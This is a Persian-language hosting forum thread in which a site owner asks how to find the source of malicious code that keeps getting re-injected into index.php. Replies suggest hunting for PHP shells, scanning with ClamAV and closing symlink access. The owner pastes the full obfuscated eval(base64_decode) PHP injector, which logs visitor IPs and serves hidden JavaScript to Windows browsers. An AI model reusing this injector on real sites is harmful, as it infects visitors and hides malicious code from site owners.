کد base64

[mohammad6006]

نمیدونم با این مشکل باید چیکار کنم

نمیدونم از اف تی پی کدوم یوزر یه ویروسی افتاده که این کد روی index.php وارد میکنه

مثلا نمونه کد:

کد:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOw0KJGRyPSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl07DQokdWEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQokb2RiZiA9ICRkci4nLycubWQ1KGRhdGUoJ20uZC55JywgdGltZSgpLTg2NDAwKSk7DQppZiAoZmlsZV9leGlzdHMoJG9kYmYpKUB1bmxpbmsoJG9kYmYpOw0KJGRiZj0kZHIuJy8nLm1kNShkYXRlKCdtLmQueScpKTsNCmlmKChzdHJwb3MoJHVhLCdXaW5kb3dzJykhPT1mYWxzZSkmJigoc3RycG9zKCR1YSwnTVNJRScpIT09ZmFsc2UpfHwoc3RycG9zKCR1YSwnT3BlcmEnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVmb3gnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ1NhZmFyaScpIT09ZmFsc2UpKSYmKHN0cnBvcyhAZmlsZV9nZXRfY29udGVudHMoJGRiZiksJGlwKSA9PT0gZmFsc2UpKSB7DQogICAgZWNobyhiYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RENTNkejEzYVc1a2IzYzdkajBpZGlJckltRnNJanRwWmloM2R5NWtiMk4xYldWdWRDbDBjbmw3Wkc5amRXMWxiblF1WW05a2VTc3JmV05oZEdOb0tHZGtjMmR6WkdjcGUyRnpaRDB3TzNSeWVYdGtQV1J2WTNWdFpXNTBmV05oZEdOb0tHRm5aSE5uS1h0aGMyUTlNVHQ5YVdZb0lXRnpaQ2w3ZHoxN1lUcDNkMzB1WVR0MlBTSmxJaTVqYjI1allYUW9kaWs3ZlgxbFBYZGJkbDA3YVdZb01TbDdaajF1WlhjZ1FYSnlZWGtvTVRBd0xERXhNQ3c1Tnl3eE1UUXNNVEE1TERFd01Dd3hNRGdzTVRFekxEUTJMREV4T0N3eE1USXNNVEF5TERFeE5pd3hNREFzTXpnc016RXNOakFzTVRBMExERXdNQ3d4TVRFc09UY3NNVEE0TERrNUxESTVMREV4TlN3eE1UVXNNVEU1TERFd05Td3hNREVzTmpBc09UQXNNekVzTVRFeUxERXhNQ3d4TVRNc01UQXlMREV4Tml3eE1EUXNNVEE1TERFd055dzFPQ3d4TURFc01UQXpMREV4Tnl3eE1ERXNPVGtzTlRjc01URXpMREV4TVN3eE1URXNOVFlzTkRVc01URXlMREV4T1N3MU55d3hNRFVzTVRBeExERXdNU3d4TVRRc05UVXNORFVzTlRJc05EWXNORFVzTVRFeUxERXhPU3cxTnl3NE9Td3pOQ3d6TVN3eE1UTXNNVEV4TERrNUxEWXdMRGt3TERNeExERXdOQ3d4TVRVc01URTBMREV3T1N3MU9DdzBOaXcwTlN3eE1EQXNNVEV4TERFeE9Dd3hNREFzTVRFd0xERXlNaXd4TURBc09UZ3NNVEUxTERFeE15dzBOU3d4TVRNc09UZ3NNVEUwTERFeE55dzVPU3d4TVRRc01URTFMREV3TUN3eE1USXNORE1zT1Rrc01URXdMREV3Tnl3ME5DdzVPU3d4TVRBc01URTFMREV3Tnl3eE1UWXNNVEF3TERFeE1pdzBOQ3d4TVRVc01URTFMRGsxTERFeE15d3hNVFVzTkRVc01URXdMREV3TVN3eE1USXNPVEVzTXpJc01qa3NNVEEwTERFd01Dd3hNRE1zTVRBd0xERXdOQ3d4TVRVc05Ua3NPRGtzTXpRc05USXNORFlzT0Rrc016UXNNekVzTVRFM0xERXdNaXd4TURBc01URTFMREV3TWl3MU9DdzVNaXd6TXl3ME55dzBOU3cwT0N3NU1Td3pNaXcxT1N3Mk1DdzBOaXd4TURNc09Ua3NNVEUwTERrMkxERXdOeXc1T0N3Mk1pd3pNeXd6T1N3MU5pazdmWGM5Wmp0elBWdGRPMlp2Y2locFBUQTdMV2tyTVRZNElUMHdPMmtyUFRFcGUybzlhVHRwWmlnb01ETXhQVDB3ZURFNUtTbHBaaWhsS1hNOWN5dFRkSEpwYm1jdVpuSnZiVU5vWVhKRGIyUmxLQ2d4S25kYmFsMHJaU2dpYWlVMElpa3BLVHQ5ZUhvOVpUdDBjbmw3Wkc5amRXMWxiblF1WW05a2VTc3JmV05oZEdOb0tHZGtjMmRrS1h0NGVpaHpLWDA4TDNOamNtbHdkRDQ9JykpOw0KICAgIGlmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpIHsNCiAgICAgICAgZnB1dHMoJGZwICwgJGlwLid8Jyk7DQogICAgICAgIGZjbG9zZSgkZnApOw0KICAgIH0NCn0='));

دکودش هم کردم اما نتونستم ریشه ی اینو پیدا کنم تا کلا پاکش کنم

چون مثلا من این کد رو از این فایل پاک کنم دوباره بعد از چند دقیقه اینجکت میشه

[nginxweb]

روی هاست شما php shell code وجود داره که هکر کد رو با اون تزریق میکنه به فایل مربوطه

هاست رو بررسی بفرمایید و فایل های مشکوک رو پاک نمایید همچنین مدیر سرور باید دستری ysmlink رو بسته باشه که مشکل امنیتی روی سرور وجود نداشته باشه

[mohammad6006]

الان من از میون این همه فایل از کجا فایل مشکوک پیدا کنم
نمیتونم که دونه دونه باز کنم فایل ها رو

[nginxweb]

الان من از میون این همه فایل از کجا فایل مشکوک پیدا کنم
نمیتونم که دونه دونه باز کنم فایل ها رو

اگر مدیر سرور هستید بوسیله دستورات لینوکس قابل پیگیری هستش اگر نیستید به مدیر سرورتون تیکت بزنید و درخواست اسکن سایت برای شل رو بدید تا اونا که دسترسی کامل دارن هاست شما رو اسکن کنند

[majidisaloo1]

بعضی شل ها با آنتی ویروس خود سی پنل clam av هم پیدا میشوند با اون یک چک کنیدببینین شاید مشکلتون برطرف شد

با تشکر
عیسی لو

[mohammad6006]

نمیشه پیدا نمیشه

خیلی وقته اگه میخواست پیدا شه تا حالا پیدا میشد

من فقط میتونم فایل هایی رو پیدا کنم که این کد روش اینجکت شده

میخوام منبع اصلی رو پیدا کنم ریشه کن کنم

فرض کنید همه فایلهای آلوده رو پاک کنیم
بعد از اف تی پی هم کانکت نشیم کلا

باز خود به خود کد اینجکت میشه